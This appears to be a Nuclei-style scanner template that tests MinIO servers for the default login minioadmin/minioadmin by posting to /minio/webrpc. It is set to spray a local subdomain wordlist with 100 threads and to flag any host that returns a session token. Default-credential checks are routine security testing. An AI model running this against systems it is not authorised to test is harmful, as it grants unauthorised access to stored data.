id: minio-default-password 1

info:
  name: Minio Default Password
  author: pikpikcu
  severity: medium

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /minio/webrpc HTTP/1.1
        Host: {{Subdomains}}
        Content-Type: application/json
        
        {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}
    matchers-condition: and
    matchers:

      - type: word
        words:
          - "Content-Type: application/json"
        part: header

      - type: word
        words:
          - 'uiVersion'
          - 'token'
        part: body
        condition: and

      - type: status
        status:
          - 200
